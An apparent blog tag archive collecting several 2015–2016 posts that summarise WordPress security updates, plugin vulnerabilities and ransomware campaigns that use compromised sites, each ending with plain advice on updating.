Tag Archives: WordPress

WordPress Security Updates Roundup (June 2016)

Last weekend WordPress made available a security update to their popular self-hosted blogging tool/content management system (CMS, defined) bringing it to version 4.5.3.

Why Should These Issues Be Considered Important?
WordPress recommends installing this update as soon as possible due to the severity of the issues that it resolves. It isn’t immediately clear but 24 security issues were addressed in this update. Please find below a summary of those issues:

  • A redirect bypass in the customizer (which could be used by an attacker to redirect to websites to perform attacks such as watering hole attacks (defined))
  • 2x cross site scripting (XSS) vulnerabilities (defined) as a result of attachment names
  • Revision history information disclosure
  • A denial of service issue (defined)
  • some less secure sanitize_file_name edge cases
  • unauthorized category removal from a post
  • password change via stolen cookie (defined)

Previously in early May this year WordPress made available version 4.5.2. This was also an important security update that addressed 2 security vulnerabilities. The first relates to a Same Origin Method Execution (SOME) (defined) vulnerability. This vulnerability is similar to a cross site scripting (XSS) vulnerability since it abuses JSON (defined) callbacks.

The second issue addressed is a more traditional cross site scripting (XSS) vulnerability within a 3rd party library, namely MediaElement.js.

Separately in early June WordPress removed a plugin named WP Mobile Detector from their plugin website when attacks begin exploiting a trivially exploitable zero-day vulnerability (defined) within it.

Researchers at the security firm Sucuri were able to determine that the attacks for this vulnerability began on the 27th of May. The vulnerability was then disclosed on the Plugin Vulnerabilities website. The vulnerability allows an attacker to upload a file of their choice to a WordPress website.

Finally, and as above in late May the security firm Sucuri discovered a critical (due to the ease of exploitation) cross site scripting (XSS) vulnerability in the popular WordPress Jetpack plugin. This issue affected more than 1 million WordPress websites.

How Can I Protect Myself from These Issues?
As always; WordPress users can update their CMS manually (access your WordPress dashboard and choose Updates -> Update Now). Since version 3.7 of WordPress an automatic updater (thanks to Sophos for this useful piece of information) will install the above mentioned update in the background. WordPress.com hosted blogs such as the one you are reading now automatically receive such security updates.

For the WP Mobile Detector; it was later updated to version 3.6 to address this vulnerability. However as noted by Sucuri in their advisory the vulnerability was not fully addressed by this new version and they are working with them to address this further shortcoming.

If you use the WP Mobile Detector plugin, please ensure that you are using the most recent version. While the vulnerability is difficult to exploit since it requires the allow_url_fopen API (defined) to be enabled. US CERT recommends disabling this API (defined) call if it is not needed for your website as a defence in depth (defined)(PDF) measure.

Lastly for the JetPack plugin, please update to version 4.0.3 or later to resolve the above mentioned critical XSS issue. Updates were also made available for all 21 code branches of the plugin if you are not already using the newest code branch. The developers of the plugin have also provided an FAQ for this update as well as the steps to install it.

Thank you.

WordPress Releases Security Update (February 2016)

On the 3rd of February WordPress released a security update to their popular self-hosted blogging tool/content management system (CMS, defined) bringing it to version 4.4.2.

This is a critical security update that resolves 2 security issues. One is a server-side request forgery (SSRF) attack that could allow information disclosure since it has the potential to bypass normal access controls. The remaining issue was present on the login page of WordPress which could have been used to cause a redirect for a user trying to login.

Due to the severity of these issues, WordPress is advising it’s users to update immediately.

Separately a ransomware (defined) campaign is compromising very large numbers of WordPress websites by adding obfuscated (defined within this post) JavaScript (defined) to the websites that results in visitors to those sites being redirected to a website of the attacker’s choice. The JavaScript can deliver the ransomware to a victim system if it is using outdated versions of Adobe Flash Player/Reader, Microsoft Internet Explorer or Silverlight since it makes uses of the Nuclear exploit kit (defined). At this time there is very little detection of the exploit code using VirusTotal.com

A shortlist of recommendations to protect your WordPress website against this ransomware campaign is shown below (for your convenience). This list including further details of this threat is available from Heimdal Security’s blog post (I wish to express my sincere thanks to them for making such detailed information available to protect against this threat):

  • Keep software and your operating system updated at all times
  • Backup your data, do it often and in multiple locations
  • Use a security tool that can filter your web traffic and protect you against ransomware, which traditional antivirus cannot detect or block.

Moreover; a technical description of how this attack occurs against a WordPress website is available within this Sucuri blog post. Malwarebytes also provide advice and a further technical description in their blog post as they describe how the exploits have switched from the Nuclear exploit kit (defined) the to the Angler exploit kit.

As always; WordPress users can update their CMS manually (access your WordPress dashboard and choose Updates -> Update Now). Since version 3.7 of WordPress an automatic updater (thanks to Sophos for this useful piece of information) will install the above mentioned update in the background. WordPress.com hosted blogs such as the one you are reading now automatically receive such security updates.

For more information on installing updates to commonly used software, this blog can assist. Please see the “Protecting Your PC” page for how to keep software updated. Moreover; specific information on Adobe updates is available here with Microsoft updates discussed here.

Thank you.

WordPress Releases Security Updates (January 2016)

On Wednesday of last week, WordPress released version 4.4.1 of it’s popular self-hosted blogging tool/content management system (CMS, defined).

This update resolves 1 security cross-site scripting (XSS) vulnerability (defined) that if exploited by an attacker could have allowed them gain control of your WordPress website. This issue was responsibly disclosed (defined) to WordPress and they worked internally to resolve it.

Due to the severity of this issue, WordPress is advising it’s users to update immediately.

WordPress users can update their CMS manually (access your WordPress dashboard and choose Updates -> Update Now). Since version 3.7 of WordPress an automatic updater (thanks to Sophos for this useful piece of information) will install the above mentioned update in the background. Full details of this update and how to install it are available in this WordPress blog post. WordPress.com hosted blogs such as the one you are reading now automatically receive such security updates.

Thank you.

WordPress Releases Security Updates

Earlier today, WordPress released version 4.3.1 of it’s popular self-hosted blogging tool/content management system (CMS, defined).

This update resolves 3 security issues:

The most serious issues was a cross-site scripting issue (defined) when processing shortcode tags that could allow an attacker to inject JavaScript (defined) of their choice into the page. Such JavaScript code could be used in watering-hole attacks (defined). This issue is discussed in more detail in this article.

A further cross-site scripting issue was also corrected in the user list table. The final issue addressed a permissions issue where a user could sticky private posts when they would otherwise not have the permissions/rights to do so.

Due to the severity of these issues, WordPress is advising it’s users to update immediately.

WordPress users can update their CMS manually (access your WordPress dashboard and choose Updates -> Update Now). Since version 3.7 of WordPress an automatic updater (thanks to Sophos for this useful piece of information) will install the above mentioned update in the background. Full details of this update and how to install it are available in this WordPress blog post. WordPress.com hosted blogs such as the one you are reading now automatically receive such security updates.

Thank you.

Unpatched WordPress Sites Used By Exploit Kits

The security firm Zscaler recently detected a large number of WordPress websites that are being used by exploit kits (exploit kits, defined) to deliver ransomware to the sites visitors. Their blog post shows the large scale nature of this issue and how many WordPress websites are currently affected. The attackers are compromising the websites by exploiting vulnerable WordPress sites allowing the installation of backdoors (see Aside below for a definition) and the injection of an Iframe (Iframe, defined) into the legitimate traffic that travels to the victim’s system when they visit the site.

WordPress sites using version 4.2 and earlier can be compromised by the security issues that they contain. Such issues were addressed by WordPress with 4 security updates being released for version 4.2 from April until August this year.

Why Should These Issues Be Considered Important?
Since the visitors to your website may have a chance of their devices becoming infected which may impact the number of visitors to your site and your website’s reputation it is in your interest and to the benefit of your visitors/customers to address these security issues.

How Can I Protect Myself From These Issues?
If your website is powered by WordPress or makes use of WordPress it is recommended to update to the latest version of WordPress which is version 4.3 (at the time of writing). The version of WordPress in question is the self-hosted/self-administered server based installation rather than the WordPress.com version which is administered by WordPress.

As mentioned in a previous blog post, if you have automatic updates enabled for WordPress (available since version 3.7, thanks again to Sophos for that information) this update will be installed for you. Alternatively you can access your WordPress dashboard and choose Updates -> Update Now.

In addition, plugins for WordPress sites such as Symposium, Google Analytics by Yoast Premium and the IFrame plugin of WordPress have also been found to have SQL injection (SQL injection, defined) and cross-site scripting (XSS) (cross-site scripting, defined) vulnerabilities. The security firm dxw Security provide advice and mitigations in the above linked to advisories for each plugin.

I hope that the above advice is useful to you in better securing your WordPress installations/websites from attack.

Thank you.

=======================
Aside:
What is a backdoor?

A backdoor is the general name given to the means for an attacker to conveniently access devices/services within an organization that they would not usually be able to do so e.g. via a command line (shell, Linux shell, Windows Command Prompt both defined).

Such a command shell will allow them to enter commands that the victim device will then carry out. This means of accessing the device/service bypasses access control methods in place to secure the device/service (under more normal circumstances) e.g. passwords, one-time passwords and smart cards etc.

An attacker will usually set up such a backdoor after initially compromising a company (e.g. using a spear phishing email, spear phishing defined) so that they can more conveniently access the company network in the future to carry out further malicious actions.

Another means of accessing the device or service would be via a VPN (e.g. VNC) or Microsoft Remote Desktop Protocol (RDP) that the attacker would have set up to enable easier access in the future. The attacker would usually use compromised credentials from an employee (obtained by some other means) of the company in order to log into the VPN to arouse as little suspicion as possible. An alternative definition of a backdoor is also available here.

Please note that the tools such as VNC and Microsoft RDP (among others) are not malicious in nature but like almost everything in this world, legitimate tools can be used for malicious purposes.
=======================

WordPress Releases Security Updates

Earlier this week, WordPress released version 4.2.4 of its self-hosted blogging tool/content management system (CMS).

This update resolves 6 serious issues, which include:

Due to the severity of these issues, WordPress is advising it’s users to update immediately.

In addition, in late July WordPress released version 4.2.3. That update resolves 2 security vulnerabilities; the first vulnerability is a cross-site scripting (XSS) issue that could allow legitimate users (with Author or Contributor rights) to compromise your website by allowing the addition of JavaScript to the website pages. With the addition of arbitrary JavaScript code to a website comes risks of malware infection (e.g. a watering hole attack) or in a severe case of an XSS attack the user’s session cookies (and thus the resources/information it has access to) are compromised by an attacker. The remaining issue involved a legitimate user with Subscriber permissions being able to carry out un-intended actions, specifically creating a draft of a webpage using the Quick Draft feature.

WordPress users can update their CMS manually or since version 3.7 of WordPress an automatic updater (thanks to Sophos for this useful piece of information) will install the above mentioned update in the background. Full details of this update and how to install it are available in this WordPress blog post. WordPress.com hosted blogs such as the one you are reading now automatically receive such security updates.

The next version WordPress namely 4.3 is anticipated to arrive on the 18th of August. While this is not a security update, it does contain important changes. In order to ensure the stability and security of your WordPress installation it is prudent to have streamlined processes in place in order to apply multiple updates to WordPress each month when necessary.

Thank you.